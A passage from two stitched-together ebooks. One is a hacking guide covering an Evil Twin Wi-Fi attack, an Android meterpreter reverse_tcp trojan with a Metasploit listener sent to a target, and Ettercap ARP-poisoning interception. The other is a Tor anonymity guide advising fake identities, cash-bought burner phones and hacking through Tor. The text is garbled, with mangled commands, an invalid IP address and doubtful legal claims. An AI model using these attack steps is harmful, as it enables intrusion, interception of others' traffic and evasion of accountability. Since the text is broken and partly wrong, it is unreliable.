out that the target’s Wi-Fi connection
signal is a lot stronger
than yours. However, by using the
following command, you
can turn the signal up:
iwconfig wlan0 txpower 27
When you input this command, you will
boost the signal of
your access point by 27 dBm or 50
milliwatts. However, be
aware that, depending on how far away
you are from the target,
that may not be sufficient to keep him
connected to the Evil Twin. If you are
using a newer wireless card, you can
boost the
signal up to 2000 milliwatts – around 4
times stronger than the
legal signal in the US.
9. Change your channel
Now, this has a warning attached to it –
in the US, it is illegal
for you to switch channels so, as an
ethical hacker, you should
make sure that you have the special
permission needed before
you do it.
Some countries do allow stronger power
in Wi-Fi signals and
this can help you to maintain the Evil
Twin signal strength.
Bolivia, for example, allows users
access to Wi-Fi channel 12,
and this comes with a maximum power
of 1000 milliwatts. So,
if you wanted to change the channel of
your wireless card to
that of Bolivia, you would input this
iw reg set BO
Your channel will now let you boost the
power of the Evil
Twin access point and you can increase
it even further by using
this command:
iwconfig wlan0 txpower 30
Type in the following command to check
the Evil Twin power:
10.Make full use of your Evil Twin
access point
Now that your Evil Twin AP is
established, and your target is
connected, you can do whatever is
necessary to detect what
activities are happening on his system.
Use Ettercap to carry
out a MiTM attack for analyzing data
that is sent or received,
intercept traffic or inject traffic that you
want the target to get.
As I said earlier, this is purely for
information purposes and should NOT
be used to carry out malicious activities

Chapter 7
The significant rise in the use of mobile
devices for connecting
with people and for online transactions
means that mobile
hacking makes sense. Smartphones and
tablets are information
hubs, full of confidential and personal
information and data that
are much easier to gain access to than a
personal computer.
Because of this, they make the perfect
target for a hacker.
Why would you want to hack a mobile
device? There are a
number of mobile hacks that you can use
to do the following:
1. Find a target’s location through GPS
services or ID
tracking 2. Gain access to a target’s
emails and record their phone
3. Find out the browsing habits of a
4. View everything that is stored on a
device, even photo
5. Send the device remote instructions
6. Use the device to send spoofed calls
or messages
Hacking Mobile Apps
If you have gotten yourself into the
mindset of a hacker you
will already have realized what the
easiest way is to hack a
mobile device – create an app. App
hacking is the fastest way
to get into a device because it is very
easy to upload an app that
may be malicious and download the
hack without even thinking
about looking at the app to see if it is
safe or not. Mobile apps
are sometimes known as “low-hanging
fruit” and they can
usually be accessed through binary
codes, the code that a mobile device
requires to execute an app. This means
everyone who has access to marketed
hacking tools has the
ability to turn them into exploits for
mobile apps. Once a
hacker has compromised a mobile app
they can carry out the
first compromise almost immediately.
These are some of the ways that a hacker
will exploit the binary
code in a mobile app:
1. Modify the code to change the
When a hacker makes changes to the
binary code, they are
effectively disabling the security
controls in the app, as well as
the ad prompts and purchasing
requirements. When they can do
that, they can put the modified app out as
a patch, a new
application or a crack.
2. Inject malicious code
A hacker can also inject malicious code
into the binary code
and distribute it as a patch or as an
update to the app. This can fool the app
user into believing that the app is being
legitimately but the hacker has actually
routed the user into
installing a completely different app
3. Create rogue apps
Hackers will also be able to carry out
“drive-by” attacks
through swizzling or API/function
hooking. Once done, the
hacker will be able to compromise the
application successfully
and can redirect traffic or steal user
4. Reverse engineering
Hackers that can access binary code can
carry out reverse
engineering hacks to show up even more
vulnerabilities, make
similar fake apps or resubmit the app
under a different branding
Remotely Exploiting a Mobile Device
The most efficient toolkit for this is Kali
Linux so follow these
steps to remotely hack your own mobile
device with the intention of installing a
malicious file on it. Do make sure that
you can easily remove this file from your
device after you have
installed it as you don’t want to cause
any damage.
5. Open Kali Linux and type in this
msfpayload android/meterpreter/reverse_tcp LHOST=
device’s IP address] R > /root/Upgrader.apk
1. Open a new terminal
While your file is being created by Kali,
load up another
terminal and then load the Metasploit
terminal by typing in this
2. Set up your listener
As soon as Metasploit is up and running,
type in the following
command to load the multi-handler
use exploit/multi/handler
Now you can make the reverse payload
by typing in this
set payload android/meterpreter/reverse_tcp
Next, to begin receiving traffic you must
set up the L host type.
To do this, type this command in:
set LHOST [Your device’s IP address]
3. Begin the exploit
Your listener is ready, so you can begin
the exploit by
activating that listener. Type this
command into do that:
Copy the Trojan or malicious file that
you created to inject into
your device from root to the mobile
device – this works best on
Android. Afterward, make the file
available – upload it to any
file-sharing site – and then send the link
to the target, asking
him to install the app. Once the target, in
this case, your own mobile phone, has
installed it, you will start to receive all
traffic that comes through the target
This is for illustrational purposes only,
to show you how easy it is to install
malicious software onto your mobile
Chapter 8
Earlier, I showed you how to carry out a
couple of Man in The
Middle attacks and now we are going to
look at another one.
This is penetration testing and the times
when you should carry
out a penetration test on your system
include when you have
installed an update, when you have
relocated, especially if you
use a Wi-Fi router, whenever your
network configuration is
changed and whenever anything new is
integrated into your
existing system. We are going to use
Ettercap and Kali Linux
to carry out this Man in The Middle
attack so let’s get going.
4. Open up Kali and log in – do this as a
root user if you
can. After you have opened up a
terminal, type in this
echo 1 > /proc/ sys/ net/ ipv4/ ip_forward
What we are doing here is maintaining
the connection and you
will need to do this whenever you restart
Kali with the
intentions of carrying out a Man in The
Middle attack
5. Now it’s time to open Ettercap. Now,
this is already
included in Kali but we need to make a
few changes
before we can use it so, in the command
line, type in:
“leafpad /etc/ ettercap/ etter.conf”.
6.You should now see atext file and,
underneath the
section for [privs] you will see this:
ec_uid = 65534 |# nobody is the default ec_gid =
nobody is the default
What you have to do here is change the
ec_uid and ec_gid
values to zero but leave #nobody is the
default# line as it is.
When you have made those changes, the
code should read as:
ec_uid = 0 ec_gid = 0.
7. Click on “Search” and you will see a
toolbar open up at
the top of LeafPad. Click on “Find” and
then, when the
dialog box appears, type in “iptables”.
Now click Enter
or “Find” and what you see should be
something like
# if you use iptables:
#redir_command_on = iptables-t nat –A
p tcp - -dport
#redir_command_off = iptables-t nat –D
PREROUTING –i %iface
p tcp - -dport
The last two lines need to be
uncommented and you do this by
removing the # symbols. When you have
finished, you should
see a code that looks like this:
#redir_command_on = iptables-t nat –A
p tcp - -dport #redir_command_off = iptables-t nat –D
PREROUTING –i %iface
p tcp - -dport
Close down Leafpad and click on “Yes”
to save all your
8. To start Ettercap. Open a new
terminal and type in the
“ettercap –G”.
Wait for Ettercap to open and when it
does, go to the toolbar
and click on “Sniff” and then on
“Unified Sniffing” when the
new menu appears.
9. Choose the interface that will best
work with your target
network – if you need some help, go to
the command
line and type in “ipconfig”
10.Provided you have done all of this
correctly, Ettercap
will load up and will move into Attack
mode. Go to the toolbar and click on the
tab that says “Host”. A new
menu will drop down, click on “Scan for
Host”. Wait
while Ettercap gets to work and, at some
point, you will
see a message that says “host added to
host list”. When
that appears, click on “Host” and then on
“Hosts List”.
11.Find the IP address of the router and
click it. Now click
on the button that says “Add to Target 1”.
Repeat this
for the target computer and this time,
choose “Add to
Target 2”
12.Go to the toolbar and click MITM. A
menu will drop
down, click on “ARP Poisoning”. A
question box will
appear; check the box beside “Sniff
Connections” and then click on “OK”
13.Wait while Ettercap poisons the
router and the target
computer. Be patient because this could
take a few
minutes. When it has finished, you will
be a virtual
insert between the router and the
computer. If the target suddenly finds that
it can’t connect to the internet, you
most likely skipped the first step or you
completed it
AFTER you opened Ettercap. If all goes
as it should,
you are now the Man in the Middle and
you can choose
a sniffer tool to work on the network and
detect the data
traffic on the target
14.When you are ready to stop this
attack, click on MITM
in the toolbar, then click on “Stop MiTM
Ettercap will put the network back to its
original state and you can close down
your hacking tool

Chapter 9
Now, think about why you would want to
do this. For a start,
you can stop your activities on the
internet from being tracked
and that can stop, or at least significantly
reduce, spam. If you
are a business owner, you might want to
check out what your
competitors are doing on the net and this
is a neat way of doing
it. Let’s say you got burned by a
company and you want to
comment on this without worrying about
the repercussions; this
is how you would do it. It also means
that there is far less of
your information to be found on the
internet and that means
hackers have a lot less to go on. In short,
if you can think of
any reason why you don’t your
information, identity, history or
location in the public domain, this is
going to be useful to you. The easiest
way to do it is to log into different
locations, public
locations like coffee shops, restaurants
or the library. Each time
you do this, your IP address will change.
However, if you
really don’t want to do that, you can use
a VPN – Virtual
Private Network – and connect to the
internet through that. This
will hide your real IP address and allow
you to stay hidden, as
well as allowing you to access content
from countries that your
laws won’t allow.
Let’s say, though, that you want to see
where an IP address is
located. Perhaps you got a threatening
email or you carried out
a pen test and want to track an IP
address you found. The first
thing you are going to need is the
database that is owned by a
company named MaxMind. This is a
company that tracks every
IP address in the world. They know
everything – the GPS
location, the post or zip code, the area
code and the country or
origin for every single address. For this,
we need to use Kali
again 1. Launch Kali and then open a
new terminal
2. Now you need to download the
MaxMind database so
type this into the command line:
The download will be in the format of a
zipped file so unzip it
by typing in this:
kali> gzip –dGeoLiteCity.dat.gz
3. Now download Pygeoip. You need
this to decode the
MaxMind database from the Python
script it is written
in. You can download in one of two
ways – separately
straight to your computer or you can get
Kali to do the
work for you. This is what we are going
to do so type in
this at the command line:
Kali>w get
Again, this will be a zipped file so use
the unzip command to
extract it:
kali> unzip
4. Next, you will need a few set-up tools
and you can
download them from Kali using the
kali > cd/ pygeoip-0.1.3
kali>w get
kali>w get
kali > python build
kali > python install
5. Now you can begin using the
database. To begin, type
this at the command prompt:
kali> python
You will see >>> on your screen,
indicating that you are now
in Python You can import the module by
typing the following
at the command prompt:
import pygeoip
6. It’s now time to start the query so, for
the purposes of
this, we are going to look for an IP
address 123.456.1.1.
To do that, we type in this at the
command line:
>>>rec = gip.record_by_addr(‘123.456.1.1’)
>>>for key.val in rec.items():
… print”%s”%(key,val)
Notice that “print” has been indented – if
you don’t do this, you
will get an error. Provided everything
has been done properly, you will now
details about that IP address – the city,
the state if necessary, the country, area
code, even the GPS coordinates.

Chapter 10
TOP 10
Incidences of hacking, in particular,
high-profile hacking, are
on the rise. We all remember the data
breach at Target, an
attack that compromised in excess of 40
million accounts and
that was followed by another one at
CNET, one of the largest
consumer and technology sites in the
world, where a hacking
group claims that they got hold of the
confidential user
credentials and emails of more than a
million people.
Scary, isn’t it? If you are looking to
protect confidential
information or data, whether you are a
business or an
individual, even if you just want to go
shopping online, you
should worry about being hacked. But
you can do things to cut
the risk and here are 10 ways that you
can do that:
1. Keep your password secure.
These are your very first line of defense
so make them good
ones. Use passwords that are a mixture
of lower and uppercase
letters, numbers and special characters.
One of the strongest
ways is to take a book, open it at a
random page, look for the
first noun, adjective or verb that you see
and remember it. Now
do this four or five more times and you
have a unique
passphrase that is virtually uncrackable!
In short, the more
complex your password can be, the
2. Don’t use any personal information
in your
passwords or passphrases
So many people do this. Don’t use the
name of your partner,
pet, or child and never use your phone
number or your
birthday. This kind of information can be
found very easily
through a simple search and that makes
your password useless.
3. Keep your operating system up to
Hackers are always coming up with new
and better ways to get
into a system so make sure that,
whenever your operating
system is due to be updated, you install
it immediately. The
best way is to have automatic updates
enabled so you don’t
need to worry about it. The same goes
for your browser; most
of the big ones update automatically but
it doesn’t hurt to run a
search for the latest security updates and
install them if any are
4. Never leave your computer
Especially when you are logging on to
the internet and
browsing. We all do it, get up and leave
our computers logged
in but it’s the perfect opportunity for any
snooper to get what
information they want. This is more true
of when you are using
your computer or mobile device in a
public place or a crowded
room. Shut everything down and, if you
can, put your computer
into sleep mode, thereby locking the
5. Get a burner email address
It never hurts to open a free account with
email providers like
Gmail, just in case you need to give out
your email online. That
way, spam into your main account is
significantly reduced and
that cuts your vulnerability. When you
open the burner account,
use as little personal information as you
can get away with.
6. Make sure mobile devices are
password protected
So many people don’t bother with a PIN
or a password for their
device and that is a huge mistake. You
will have sensitive
information stored on your tablet or
phone and not protecting it
can come back to bite you!
7. Never use the same password for
different sites
It may be difficult to remember all these
passwords but using
the same one for every site you visit is a
big mistake. Once a
hacker has access to one site, everything
you go to is
potentially up for compromise.
8. Change your passwords regularly
Try to change all your passwords once
every 30 days as a
minimum. This will significantly reduce
your chances of being
hacked and losing all your information
9. Set email to plain-text
One of the most common ways for a
hacker to target a victim is
through email. They embed an image in
an email that will
automatically display and they track you
through this. Set your
email to display in plain text only and
only open those that
come from trusted senders.
10. Never keep a list of passwords
Again, you might be surprised at the
number of people that
write all their passwords down or keep
them in a file on their
computer. Not a good idea; once you’ve
been hacked, the
hacker has everything he or she needs, I
realize that it is going to be a huge
challenge to manage all of
your passwords, especially if you are
registered on lots of sites.
You do need to make them all unique and
they must all be
strong so look into using a password
manager. That way you only have to
remember one password!

Thank you again for reading this book
and I hope that it was
able to help you learn how to keep your
system secure and
what hacking is all about.
The next step is to practice, learn some
more, practice again
and keep on doing it until your system is
as secure as you can
make it. Keep in mind that hacking
techniques are forever
moving onwards and you have to keep
up with them to stay
ahead of the malicious hackers.
Reconnaissance and scanning
are just the tip of the iceberg when it
comes to seeing how to
protect your system and you will need to
move on and learn
more as time goes on.
Finally, if you enjoyed this book, please
take the time to post a
review on Amazon for me. It’d be
greatly appreciated! Thank you and good
Tor and the Deep Web: A
Guide to Become Anonymous
Online, Conceal Your IP
Address, Block NSA Spying
and Hack!
Joshua Welsh
Copyright 2016 by Joshua Welsh - All rights

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Table of Contents
Chapter one: Tor- What is it and How
Can it Benefit You?.....1
Chapter two: Using Tor to Be
Anonymous Online..................9
Chapter three: Browsing the Internet
Anonymously with Tor
Chapter four: Evading the NSA So They
Cannot Spy on You18
Chapter five: Using Tor for
Chapter six: Types of
Chapter seven: Hacking into the Tor
Chapter eight: The Weaknesses of
Congratulations on downloading Tor and
thank you for doing so.
The following chapters will discuss how
you will use Tor for more than just
hiding who you are online. Tor can be
used for hacking into programs without
anyone seeing you.

Tor is going to be one of the programs

that is sought after the most by the
government and law offices everywhere
despite the fact that you may not be using
it for illegal activities. You will learn
more about this in later chapters of the

There are plenty of books on this subject

on the market, thanks again for choosing
this one! Every effort was made to
ensure it is full of as much useful
information as possible, please enjoy!

Chapter one

Tor is a program that is made up of a

network of servers that are operated by
teams of volunteers so that people are
able to improve the security as well as
the privacy that they have when it comes
to them browsing online. Anyone who is
using Tor is going to be connected
through a series of virtual tunnels that
are going to make it to where there is no
direct connection to what they are doing
and themselves. Therefore, when
someone shares any sort of information
on a public network, they are not going
to need to worry about their privacy
being compromised. It also makes it to
where a user is allowed to access
destinations that are normally restricted

It is necessary to use Tor when it comes

to helping protect against online
surveillance which is otherwise known
as traffic analysis. Traffic analysis is
used when someone is wanting to see
what is being done on a public network.
The different sources and destinations of
the traffic that occurs on the internet
gives other people a way to track
someone’s interests and behaviors which
leads to making hacking easier because
they know more about you than you
know they do. People who do this are
going to be making it difficult for you to
be able to get a job if you are applying
online or even affect your physical
safety by figuring out exactly where you
are located.

The internet collects data packets and

when these packets are broken down,
this is when traffic analysis comes into
play. The payload that comes from the
data along with the header is going to be
what directs traffic whenever online.
This payload is going to be the
information that is embedded whenever
emails, audio files, or webpages are
accessed. While the payload will be
encrypted, the traffic analysis is going to
be able to expose most of this
information so that what you are looking
for online is exposed. The header is one
focus of traffic analysis to because it
lists the destination, source, timing, and
size of the files found on the internet.

Whenever Tor is downloaded, the

download process is simple because the
only thing that needs to be downloaded
is the Tor browser. After it has been
downloaded, it can be used just like any
other browser would be used. Tor is
available on multiple operating systems
as well. There is extra information on
the Tor website that are going to assist in
the process of using Tor.
After Tor has been downloaded, it can
be used as soon as the download is
done. Since Tor is one of the more
secure browsers, there is going to be
government intelligence agencies that
are going to watch it. Surprisingly, the
FBI has admitted that they have tried to
take Tor down with a malware attack.

There are of course weaknesses with

Tor, but it has yet to be completely
penetrated. When Tor is used the way
that it is supposed to be, then what you
are doing online will be completely
hidden from anyone spying on you.

When you use Tor correctly, your

computer is going to have less of a
chance of being compromised, but there
are other things that you can do to make
it even easier to protect yourself while
using Tor.

Tor should not be used on Windows.

That includes using the Tor bundles. The
bundles have weaknesses that were part
of the takedown of Freedom Hosting by
the FBI.

If a workstation cannot be created when

you are using Linux along with Tor, make
sure that you have a proxy such as
Privoxy along with a browser that has a
firewall for any data that might leave the
browser. If Clearnet is not working, try
Tails or Whonix because they are going
to help make sure that no data is leaked.
There must be a firewall to make sur that
no third party can get ahold of your data
so that they can figure out where you are
on the internet.

Any sTorage that you are using needs to

be encrypted. The most up to date
version of LUKS is a good one to use
and is offered during installation of Tor
in most cases.

Your computer needs to be kept up to

date in order to us Tor. That way you can
build your workstations and avoid any
security breaches. Try and check for
updates at least once a day so that you
do not miss anything that might update
such as your security that is offered by
your computer.

Disable Flash, JavaScript, and Java. If

you are looking at a site that requires
these applications to be used, then it is
advised that you look at another site.
Should you absolutely need to go to that
site, then you may enable scripting but it
should only be temporary and done when
there is no other option.

Dump any data or cookies that a

website is going to send to your
computer. This has to be done by you
because there is no application that is
able to do this. So, you are going to get
an add on that is going to be called self
destructing cookies and that is going to
make it to where any cookies on your
computer are destroyed completely.

It is wise to make your workstation a

laptop because it can easily be moved
and gotten rid of it there is a problem.

Google, while a popular search engine,

should not be used. Try and use a start
up page instead so that you are not
required to put in a captcha.

Along with how you use Tor, the

environment in which you use Tor is
equally important. As it will be
discussed later, Tor has some big
weaknesses that are going to easily be
hacked so that someone can get into your
computer and get the data that you are
inputting into sites. But, there are some
things that you can do that are going to
ensure that you are making it harder for a
hacker to get into your computer.

Tor should not be used when you are

home. No sensitive information should
be done whenever Tor is being used at
home, even if you are offline. There are
computers that can be connected without
you ever knowing. Therefore, if you are
not using Tor at home, then you are not
going to be tied to a location. If you are
worried about advanced threats, then
move your location when you are using
Tor. But, if you are not worried about
these threats, you can use Tor at home as
long as you are not worried about the
information you are putting online.

Be careful with how much time you are

on Tor in one location. Hackers can get
within the same time period that you are
on without you even knowing. So, if you
are using a public network like
McDonalds, a hacker can be there the
next day waiting on you. In case you are
really concerned about how much time
you are spending on Tor in a single
location, then do not be on it for more
than twenty-four hours in that location. If
you have used it at one location, do not
go back. People are less likely to
remember you if you have never gone
back to a location after you have visited
it, rather than if are there every day or
even a couple times a week.

Any activities that you are doing online

that makes it to where you do not want to
be tracked, leave your cell phone at
home and on so that if you are being
tracked, they believe that you are still at
home. But, make sure that you let anyone
who is going to try and get a hold of you
where you are going and when you are
going to be back so that they are not
worried about you when you do not
answer your phone.

Now that you know about what to do and

not to do as far as your computer and
your work space, what about mentally?
It does not matter what you are doing,
how you look at it mentally is going to
play a big part on if it works or not.
Some people are going to be afraid to
use Tor because they think that they are
doing something wrong or they use the
email that they use every day when they
are using Tor. Changing how you look at
Tor is going to assist you in using it.

When you are using Tor, you should

create a virtual identity that is not going
to be tied back to you. You are basically
wanting to separate what you are doing
on Tor from your real life.

Create new accounts with your fake

identity if you are using an internet
service that is public, such as ones that
are found in Starbucks. Do not mix up
your virtual accounts and your real
accounts. For example, if you have a
new social media account with the fake
email that you have made, then do not
create anything else with a different
email on that computer until you are on a
secure network and in a different

Do not do anything that is related to

your fake accounts on Clearnet unless
you have no other choice.

If you need to make a call when you are

using Tor, it is wise to have a prepaid
phone that is not tied back to you. One
can usually be purchased in the sTore
and when you do purchase it, you should
use cash to ensure that your name is not
tied to that phone. Do not use a SIM card
with this phone and do not activate it
anywhere near your home. No one needs
to know about the phone unless they
know about your fake identity.

Using Tor also has its benefits such as

hiding what you are doing online. There
is an increase in privacy and security
when you are using Tor. This can be
especially helpful to make sure hackers
or any government agencies are not
seeing what you are doing. So, if you are
doing things that you do not want tied
back to you, Tor is going to be perfect
for you to use.

While you are going to be able to hide

what you are doing online, you need to
be careful as to what you are doing and
how you are doing it because you can
cause people to become suspicious and
they will watch you to see what you are
doing. So, depending on what you are
doing you can draw attention from
family members or worse.

Chapter two

Chances are at this point in time you

have already downloaded Tor. But, how
is it that you are going to be able to use
it? It is pretty simple to use Tor, but in
this chapter, we are going to go over
how to use Tor just in case you are not
familiar with how to use a browser that
you have downloaded. Not just that, but
Tor is extremely different, so you are
going to need to make sure that you are
using it right and not leaking your

After the browser has been installed on

your computer, there is going to be a
folder that is labeled Tor Browser.
Inside of that browser you are going to
find that there is a button that says “Start
Tor Browser.exe”. You are going to want
to click on that so that a new window is
opened up.
From here you are going to be asked if
you are going to want to connect to the
Tor network or if you are going to want
to configure the settings first. It is going
to be best for you to just choose connect.
It will take a few seconds before a
browser is opened and will be
connected to the network so that you are
able to use the internet anonymously.
If you are wanting to ensure that you are
connected to the network, you will need
to go to the website This website is
going to figure out where you are in the
world based on your IP address. In being
connected to the Tor network, your IP
should show up anywhere that is not
your actual location. In this case, you are
connected and you are ready to use Tor.

Tor needs to be used for any browsing

that you are not wanting anyone else to
see. There are other programs on your
computer that are not going to be
connected to Tor so they are not going to
be secure and if you are using them, your
information is still out there for other
people to see.

However, there are going to be some

things that you need to remember when
you are using Tor because just using it
like any other browser is really not an
option. Each site that you connect to
needs to be through an encryption of SSL
or TSL. If you are not using encrypted
sites, then you are going to be letting
anyone see what you are doing online as
it leaves the exit node. There is a
browser that can be added onto Tor that
was made by the Electronic Frontier
Foundation that will ensure that any sites
that you are on are using SSL or TSL.

Be careful of where you are browsing.

Just because no one can see what you
are doing does not mean that you are
completely invisible. You are still going
to be able to get viruses and malware on
your computer if you are not paying
attention to what you are doing. You may
be able to hide what you are doing by
using Tor, but Tor is not going to be able
to help protect you from something that
may bring your computer down.

If you are not doing anything that is out

of the normal when you are using the
internet, then using Tor should not be a
problem for you. It is going to be more
than enough to help make sure that you
are kept hidden online.

Chapter three

People do not want others to know what

they are doing online. Therefore,
everyone wants to make sure that their
online activities are kept private so that
any searches that they do are not able to
be traced back to them. But, let’s be
honest, it does not matter what you do
online, it is going to all be connected
back to you no matter what kind of WiFi
network you are using. Things are going
to be traced back to your computer and
therefore to you. Many people are not
doing anything illegal online, but it is
hard to wrap our heads around the fact
that we are not truly able to do what we
are wanting to do online without
someone seeing it. With as many people
that are online, you can never really tell
who is going to see what you are doing,
whether it be a hacker or NSA.

Your IP address is going to be how all of

your activity online is going to be traced
back to you. The IP that is tagged to your
computer is going to be a code that is
unique to your devices and is going to be
associated with any devices that are on a
network. The provider is then going to
be given with a geographical location of
the device that is being used on their
network. Each time that a website is
accessed, that IP address is going to go
through several servers which is going
to put a location on where you are.

Normally the information that is sent

through the servers is going to tell the
website what needs to be displayed
along with the advertisements that you
see on the page. This information is
going to be limited depending on where
you are trying to access the website.
Some websites are going to attract the
attention of certain agencies such as
pornographic sites.

But, never fear, there are going to be

ways that you are going to be able to
keep your activity from being tracked

The VPN or virtual private network is

going to make it to where you are
connected to the internet through a server
that has a VPN provider. The
information that is going through your
devices with the VPN servers will be
encrypted. The setup for a VPN will
provide the privacy that most people
need by concealing what they are doing
online from the ISP and the government.
But, it also enables the user to get away
from anyone who might be censoring
them wherever they are working.

You should create a geo-spoof so that

you are able to get into services that you
may be been denied before because of
where you are located or if you are
traveling outside of the country. VPNs
also protect against hackers when you
are using public networks that way you
are able to download P2P safely.

A subscription to VPN is going to be

available to anyone on any device. All
you are going to need to do is sign up
with a company that has a plan that
offers VPN access. Once you have
signed up for the plan, the software
needs to be downloaded so that all the
applications that you are using are
protected. A server location has to be
chosen before you can connect to it. The
VPN is going to hide the IP address that
you are using and there will be an
address assigned to you that is
associated with the server that you are
using. After that, the activity that you
participate on online is going to be
hidden as well as encrypted. You are
going to be able to use your own
network or public networks without
anything being traced back to you.
When a VPN is chosen, you will look
for features that are going to be
important to your connectivity and the
security that you are looking for. The
VPN needs to have the proper
bandwidth so that it can deal with any
data transfer limits that may be set by the
internet service provider. Most VPNs
have unlimited bandwidth, but you need
to double check and make sure that you
are not getting one that has limits or your
browsing is going to be slowed down.
The VPN should also allow for multiple
devices to be connected at once.

Last but not last, you will want to look

for how strong the encryption is. The
two strengths that you are going to see
the most are 128 and 256 bit. The bigger
one is obviously going to be the stronger
strength, so if you can, you will want to
get that one. The VPN should also
enable you to choose what security
protocols are put into place. Encryption
has the possibility of slowing down your
network connection depending on how
high it is set.

As you continue to search for VPN, you

will also want to look at the network
size. The VPN that you pick needs to
have at least fifty servers on their
network if not more. The more servers
that there are, the wider the distribution
is going to be so the higher the
bandwidth will be.
Be sure that you check the compatibility
of the system. Basically, all you are
doing is making sure that it is going to
work with the devices that you are using.
VPNs with automatic set up and
excellent customer service are going to
be the ones that you are wanting to go
with just in case you end up needing
some help with it. Here are the top three
VPNs that are going to make it easier for
you to get around online without anyone
knowing what you are doing.
Express VPN: anyone who uses this
VPN gave it a fairly

high score. It has one of the highest

encryptions that you are going to be able
to get as well as a fast connection. There
are some pros and cons as there is with
anything that you are going to use.
Express has unlimited bandwidth and
you are able to get at least two
connections per account. There is a
worldwide network available, automatic
set up, and it is compatible with most of
the devices that are used. Not only that,
but the connection is fast and reliable.
There is a 256 bit encryption plan and
you can customize it to fit your needs.
Along with that, you will be able to get
help twenty four seven and if you are not
happy with it, you will get your money
back. Express however does not have
any phone support, all the support that
you are going to find is going to be
IPVanish: with IP vanish, it got a
relatively high rating, but not as high as
Express. There is a fast connection and
it will allow you to have two
connections per account. There is also
unlimited bandwidth available at a 256
bit encryption rate. The network is
worldwide and there is twenty four
seven support through email. If you do
not like it, you have one week to be able
to get your money back. It cannot be used
with iOS though and there is no referral
program. It may have great connectivity,
but it is not going to be the best if you
are an Apple user.

HideMyAss: this is the last VPN that

will be discussed. It too has unlimited
bandwidth and is compatible with all
devices. Just like the other ones you are
able to get two connections per device
and you are going to have 256
encryptions. There is twenty four hour
support should you need it. But, the
connection is going to be slow and at
best, unreliable. The customer support is
going to be slow to respond to anything
that you ask and the software is going to
make it to where you may find it difficult
to use. So, it is not one of the best
options for you to pick from for VPN.

There are going to be other VPNs that

you can choose from so that you can hide
what you are doing online. The decision
is going to be up to you on what you
decide to do.

Chapter four

The NSA is one of the government

agencies that looks at what the people of
the United States are doing on the
internet so that they can try and catch
terrorists. But, not everyone wants the
NSA to know what they are doing
online, especially the government
because some people think that the
government already has too much power
and allowing them to know what is going
on in our personal lives is to hide what
we are doing so that we can protect

A tool has been created by security

researchers that allows for people to
lower the chance of a bad Tor
connection being used. These same
researchers have said that the AsToria
tool for Tor is made to beat any attacks
that may occur on Tor.

American and Israeli researchers

developed the AsToria tool to be able to
provide the users of Tor a way to get rid
of the autonomous systems that are
constantly trying to reveal their online
identities. Timed attacks are going to be
one of the biggest threats that Astroia
helps to prevent.
One of the researchers said: “Defeating
timing attacks against Tor completely
isn’t possible because of how Tor is
built, but making the attacks more costly
and less likely to succeed is a pastime
that Tor developers have dedicated a
decade to. AsToria follows in those

Algorithms have been built into AsToria

so that they are able to fight against any
of the worst case scenarios that may pop
up. AsToria automatically checks to see
which is the best route so that no relays
become available.

AsToria is meant to be an add on for Tor

so that you are able to continue to hide
when you are online. The NSA and FBI
want to take down Tor because it makes
it to where they cannot watch everything
that everyone is doing. If they are able to
find any weakness that Tor might have,
they are going to use it to try and exTort
the connection, even if that means putting
a virus on your computer.

Tor, if used properly, is going to hide

what you are doing online as we have
discussed earlier in this book. However,
there are always going to be people or
agencies that are going to try and get into
the browser.

Even if you have AsToria added on to

your browser and if you do everything
that you know is going to protect you so
that you are not going to be attacked, that
does not mean that something is not
going to happen.

Just forgetting to use Tor one time, using

it in the wrong place, or going to the
same place to use the network more than
once is going to make it to where
hackers such as the NSA are able to
crack through all the security measures
that you have in place and figure out
what it is that you are doing.

A few other things that you can do is to

quit social media. You do not have to go
on and delete your profile if you do not
want to, but you can stop logging in and
posting on them. It does not matter what
you post or if you try and delete it, once
it is out there, it is there…for good.

Not only are you going to be stopping

other various issues that social media
can bring around, but you are going to be
stopping the NSA from having access to
what you are doing on social media but
looking at the servers for that social

In all honesty, unless you have given the

NSA something to worry about, you do
not need to worry about them spying on
you. They have better things to do with
their time than to follow someone around
on the internet who is using social media
and their email.

The thing is, Tor is going to be the best

way that you are going to be able to hide
what you are doing online. Just be
careful with what you are doing online
and you should be fine and not have to
worry about any viruses getting onto
your computer or someone hacking it.
If you are that worried about the
government keeping an eye on you,
simply log off. Get off the computer and
do not look back. If you are not on it,
then how are they going to keep tabs on

Chapter five
Hacking is done for many different
reasons. Hacking is highly illegal and
needs to be done under safe
circumstances. You can use Tor to hack
like you can any other application. But,
there are more ways that you are going
to be able to hack with Tor, it is just
going to make it more complex and you
will need to have more patience. Just
like with any hacking, you are going to
need to be diligent and make sure you
are not going too fast or else you may get

The most obvious first step is going to

be that you need to download a Tor
Browser. You can go to and find a
download for the browser. Make sure
that you set up your browser and
configure it to the way that you are
wanting it to be so that it works for you.
The most common way to set up Tor is to
just let it go through its normal set up.
Settings can always be changed at a later

As we talked about earlier, you are

going to want to test the Tor network and
make sure that you are actually on the
network. If you are not on the network,
then you are going to get caught being
that you are not going to be hiding very
well because your IP address is going to
be the same IP address that is tied to
where you are. You do not want people
to know where you are or you are going
to lead them right to your front door!

Now you are going to enter

onto the Tor browser’s URL bar. You
now have access to the deep web
services like: Hidden Wiki, Tails, Tor
Search Engines and much more.

The hidden wiki is going to give deep

web sites that you are going to be able to
access when illegal business is being
done. Please note that this book is not
advocating anything that is illegal. The
hacking purposes that are talked about in
this book are for educational purposes
only. Anything that is done illegally is
going to be able to be persecuted under
the full extent of the law if and when you
get caught. So, it is not advised that you
do anything illegal, even if no one can
see what it is that you are doing online.

Congratulations, you are now in deep

With deep web you can use the tunnels
that are associated with Tor to get into
other websites.

However, you can also add on tools to a

browser such as FireFox that are going
to make hacking that much easier
because not only are they going to hide
what you are doing and where you are,
but they are also going to make it to
where you do not have as many steps to
go through when you are trying to hack.

These two add ons are Page Hacker and

HackBar. Both of these add ons will
enable you to use traditional hacking
skills needed to hack into systems and

Here are the traditional steps that you

may follow for hacking into a system.
The only difference that you are going to
see is that you are going to use Tor and
the add ons that you now have.

Step One:

You’re going to want to use a *nix

terminal for all your commands that
you’re going to be using when it comes
to hacking. Cygwin is a good program
that will actually emulate the *nix for
those users who use Windows. If you do
not have access to Cygwin, then it is best
that you use Nmap which will run off
WinPCap while you’re still on windows
even though you’re not using Cygwin.
However, the downside to Nmap is that
it will run poorly on the Windows
operating system because there is a lack
of raw sockets.

When you’re actually hacking, you’re

most likely going to want to consider
using BSD or Linux as both of these
systems are flexible no matter what type
of system you are using. But, it is
important to know that Linux will have
more tools that are pre-installed and
ultimately more useful to you when it
comes to your hacking ventures.

Step Two:

